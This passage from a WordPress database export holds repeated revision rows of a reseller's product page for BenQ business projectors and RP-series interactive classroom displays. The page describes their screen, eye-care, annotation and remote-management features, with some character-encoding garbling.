srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Integrated Front-Facing Speaker and Pen Tray</strong></p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Account Management System for Personalized File Management</strong></p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.</p><p><strong>NFC Pen</strong></p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Front Buttons</strong> <br />The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.</p><p><strong>Instant Plug and Play</strong> <br />RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and youâ€™re all set to deliver compelling IFP touch-enhanced lessons.</p><p><strong>Parental Control</strong> <br />BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.</p>		\n			<h4>Display Management Support</h4>		\n		<p><strong>Multiple Display Administrator (MDA)</strong></p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on/off times, which helps to create hassle-free maintenance.</p>		\n										<img width=\"560\" height=\"303\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05-300x162.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"560\" height=\"358\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06-300x192.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>EasySetting</strong></p><p>Install Androidâ„¢ apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.</p><p><strong>Over-the-Air Update (OTA)</strong></p><p>Upgrade your displays with the latest BenQ firmware via BenQâ€™s OTA update support to keep them running smoothly at all times.</p>		\n										<img width=\"560\" height=\"355\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07-300x190.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />','BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™','','inherit','closed','closed','','1447-revision-v1','','','2019-01-07 17:42:10','2019-01-07 09:42:10','',1447,'https://bintara.com.my/blog/2019/01/07/1447-revision-v1/',0,'revision','',0),(2842,1,'2019-01-07 17:40:36','2019-01-07 09:40:36','<h3>BenQ</h3>\r\n<h3><u>Projectors</u></h3>\r\n<h3>Business Projector (Smart Design for Presentations)</h3>\r\n<h4>High Brightness for Well-Lit Rooms</h4>\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<h3>Interactive Classroom Projectors</h3>\r\n<h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h3><u>Interactive Flat Panel</u></h3>\r\n<h4>Meeting Room &amp; Boardroom</h4>\r\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\r\n<h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4>\r\n<strong>Work Collaboratively and Conduct Business Efficiently</strong>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\r\n\r\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\r\n\r\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\r\n<h4>How BenQ Display turns meeting rooms into places of efficiency</h4>\r\n<ul>\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n<h3>BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™</h3>\r\n<h4>4K UHD 70â€™â€™ Education Interactive Flat Panel Display | RP704K</h4>\r\n<strong>Your Caring Mate for Enhanced Interactive Learning</strong>\r\n\r\nThe RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png 1024w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-300x182.png 300w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-768x467.png 768w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png 1110w\" alt=\"\" width=\"800\" height=\"487\" />\r\n<h4>Create a Healthy Learning Environment for Students</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png 560w, https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1-300x138.png 300w\" alt=\"\" width=\"560\" height=\"258\" />\r\n\r\n<strong>Germ-Resistant Screen</strong>\r\nThe Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silverâ€™s antimicrobial feature remains effective even after thorough cleaning or long periods of use.\r\n\r\n<strong>* TUV Test Confirmed</strong>\r\nTUV is the worldâ€™s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUVâ€™s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screenâ€™s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQâ€™s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.\r\n\r\n<strong>Smart Eye-Care Solution</strong>\r\n\r\nThe Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.\r\n*For Android devices, BenQâ€™s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.\r\n\r\n<strong>TÃœV-Certified Low Blue Light Technology</strong>\r\n\r\nBlue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQâ€™s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png\" sizes=\"(max-width: 642px) 100vw, 642px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png 642w, https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight-300x205.png 300w\" alt=\"\" width=\"642\" height=\"438\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\" sizes=\"(max-width: 616px) 100vw, 616px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png 616w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png 300w\" alt=\"\" width=\"616\" height=\"395\" />\r\n\r\n<strong>Anti-Glare Display</strong>\r\n\r\nScreen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704Kâ€™s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.\r\n<h4>EZWrite 4.1 : An Easy and Fun Annotation Solution</h4>\r\n<strong>Intelligent Handwriting Recognition</strong>\r\n\r\nThe Smartboard RP704Kâ€™s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22-300x189.jpg 300w\" alt=\"\" width=\"560\" height=\"352\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg\" sizes=\"(max-width: 510px) 100vw, 510px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01-300x212.jpg 300w\" alt=\"\" width=\"510\" height=\"361\" />\r\n\r\n<strong>Wireless Solution for Seamless Collaboration</strong>\r\n\r\nInstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.\r\n\r\n<strong>20-Point Multi-Touch Interactivity</strong>\r\n\r\nAs the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg\" sizes=\"(max-width: 510px) 100vw, 510px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02-300x194.jpg 300w\" alt=\"\" width=\"510\" height=\"330\" />\r\n<h4>Facilitate Teaching Flow with Friendly Design</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png\" sizes=\"(max-width: 360px) 100vw, 360px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08-300x278.png 300w\" alt=\"\" width=\"360\" height=\"333\" />\r\n\r\n<strong>Integrated Front-Facing Speaker and Pen Tray</strong>\r\n\r\nRP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png\" sizes=\"(max-width: 360px) 100vw, 360px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09-300x278.png 300w\" alt=\"\" width=\"360\" height=\"333\" />\r\n\r\n<strong>Account Management System for Personalized File Management</strong>\r\n\r\nBenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.\r\n\r\n<strong>NFC Pen</strong>\r\n\r\nWith a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png\" sizes=\"(max-width: 360px) 100vw, 360px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10-300x278.png 300w\" alt=\"\" width=\"360\" height=\"333\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04-300x189.jpg 300w\" alt=\"\" width=\"560\" height=\"352\" />\r\n\r\n<strong>Front Buttons</strong>\r\nThe front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.\r\n\r\n<strong>Instant Plug and Play</strong>\r\nRP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and youâ€™re all set to deliver compelling IFP touch-enhanced lessons.\r\n\r\n<strong>Parental Control</strong>\r\nBenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.\r\n<h4>Display Management Support</h4>\r\n<strong>Multiple Display Administrator (MDA)</strong>\r\n\r\nMultiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on/off times, which helps to create hassle-free maintenance.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05-300x162.jpg 300w\" alt=\"\" width=\"560\" height=\"303\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-06-300x192.jpg 300w\" alt=\"\" width=\"560\" height=\"358\" />\r\n\r\n<strong>EasySetting</strong>\r\n\r\nInstall Androidâ„¢ apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.\r\n\r\n<strong>Over-the-Air Update (OTA)</strong>\r\n\r\nUpgrade your displays with the latest BenQ firmware via BenQâ€™s OTA update support to keep them running smoothly at all times.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg\" sizes=\"(max-width: 560px) 100vw, 560px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-07-300x190.jpg 300w\" alt=\"\" width=\"560\" height=\"355\" />','BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™','','inherit','closed','closed','','1447-revision-v1','','','2019-01-07 17:40:36','2019-01-07 09:40:36','',1447,'https://bintara.com.my/blog/2019/01/07/1447-revision-v1/',0,'revision','',0),(2832,1,'2019-01-07 17:21:06','2019-01-07 09:21:06','<h3>BenQ</h3><h3><u>Projectors</u></h3><h3>Business Projector (Smart Design for Presentations)</h3><h4>High Brightness for Well-Lit Rooms</h4><p>Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.</p><h3>Interactive Classroom Projectors</h3><h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4><p>Futureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.</p><ul><li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li><li>High Brightness from 3000-3500 ANSI Lumens</li><li>High resolution with (Ultra) Short Throw</li><li>Scalable for Wireless Use and Interactivity</li></ul><h3><u>Interactive Flat Panel</u></h3><h4>Meeting Room &amp; Boardroom</h4><p>Digital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.</p><h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4><p><strong>Work Collaboratively and Conduct Business Efficiently</strong><br />The RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.</p><p>Whether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.</p><p>Featuring an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.</p><h4>How BenQ Display turns meeting rooms into places of efficiency</h4><ul><li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li><li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li><li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li><li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li></ul><p>[maxbutton id=\"1\" ]</p>		\n			<h3>BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70â€™â€™</h3>		\n		<h4>4K UHD 70â€™â€™ Education Interactive Flat Panel Display | RP704K</h4><p><strong>Your Caring Mate for Enhanced Interactive Learning</strong></p><p><br />The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.</p>		\n										<img width=\"800\" height=\"487\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-1024x623.png 1024w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-300x182.png 300w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1-768x467.png 768w, https://bintara.com.my/wp-content/uploads/2019/01/Board-Management-1.png 1110w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>Create a Healthy Learning Environment for Students</h4>		\n										<img width=\"560\" height=\"258\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1.png 560w, https://bintara.com.my/wp-content/uploads/2019/01/edu-rp750k-21-1-300x138.png 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Germ-Resistant Screen</strong><br />The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silverâ€™s antimicrobial feature remains effective even after thorough cleaning or long periods of use.</p><p><strong>* TUV Test Confirmed</strong><br />TUV is the worldâ€™s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUVâ€™s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screenâ€™s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQâ€™s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.</p><p><strong>Smart Eye-Care Solution</strong></p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br />*For Android devices, BenQâ€™s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.</p><p><strong>TÃœV-Certified Low Blue Light Technology</strong></p><p>Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQâ€™s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.</p>		\n										<img width=\"642\" height=\"438\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight.png 642w, https://bintara.com.my/wp-content/uploads/2019/01/low-bluelight-300x205.png 300w\" sizes=\"(max-width: 642px) 100vw, 642px\" />											\n										<img width=\"616\" height=\"395\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png 616w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png 300w\" sizes=\"(max-width: 616px) 100vw, 616px\" />											\n		<p><strong>Anti-Glare Display</strong></p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704Kâ€™s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.</p>		\n			<h4>EZWrite 4.1 : An Easy and Fun Annotation Solution</h4>		\n		<p><strong>Intelligent Handwriting Recognition</strong></p><p>The Smartboard RP704Kâ€™s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.</p>		\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-22-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"510\" height=\"361\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-01-300x212.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p><strong>Wireless Solution for Seamless Collaboration</strong></p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.</p><p><strong>20-Point Multi-Touch Interactivity</strong></p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.</p>		\n										<img width=\"510\" height=\"330\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02.jpg 510w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-02-300x194.jpg 300w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n			<h4>Facilitate Teaching Flow with Friendly Design</h4>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-08-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Integrated Front-Facing Speaker and Pen Tray</strong></p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-09-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n		<p><strong>Account Management System for Personalized File Management</strong></p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.</p><p><strong>NFC Pen</strong></p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.</p>		\n										<img width=\"360\" height=\"333\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10.png 360w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-10-300x278.png 300w\" sizes=\"(max-width: 360px) 100vw, 360px\" />											\n										<img width=\"560\" height=\"352\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-04-300x189.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n		<p><strong>Front Buttons</strong> <br />The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.</p><p><strong>Instant Plug and Play</strong> <br />RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and youâ€™re all set to deliver compelling IFP touch-enhanced lessons.</p><p><strong>Parental Control</strong> <br />BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.</p>		\n			<h4>Display Management Support</h4>		\n		<p><strong>Multiple Display Administrator (MDA)</strong></p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on/off times, which helps to create hassle-free maintenance.</p>		\n										<img width=\"560\" height=\"303\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05.jpg 560w, https://bintara.com.my/wp-content/uploads/2019/01/rp750k-05-300x162.jpg 300w\" sizes=\"(max-width: 560px) 100vw, 560px\" />											\n										<img width=\"560\" height=\"358\" 